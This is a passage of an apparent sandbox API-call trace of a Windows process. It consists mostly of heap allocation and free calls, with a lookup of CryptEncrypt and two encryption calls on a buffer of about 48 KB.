hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24dac08 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.075] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0260.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0260.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a95b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0260.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.077] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0260.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0260.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0260.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0260.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0260.077] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xbb35, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xbb38) returned 1 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0260.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0260.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0260.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0260.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0260.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0260.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.081] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.081] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.081] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.081] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.082] CharLowerBuffW (in: lpsz="byte[47928]", cchLength=0xb | out: lpsz="byte[47928]") returned 0xb [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0260.082] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0260.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0260.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0260.084] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0260.084] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.084] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0260.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0260.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.085] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.085] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.085] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0260.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0260.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0260.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0260.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.085] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24dac08*, pdwDataLen=0x8bef68*=0xbb35, dwBufLen=0xbb38 | out: pbData=0x24dac08*, pdwDataLen=0x8bef68*=0xbb38) returned 1 [0260.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0260.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 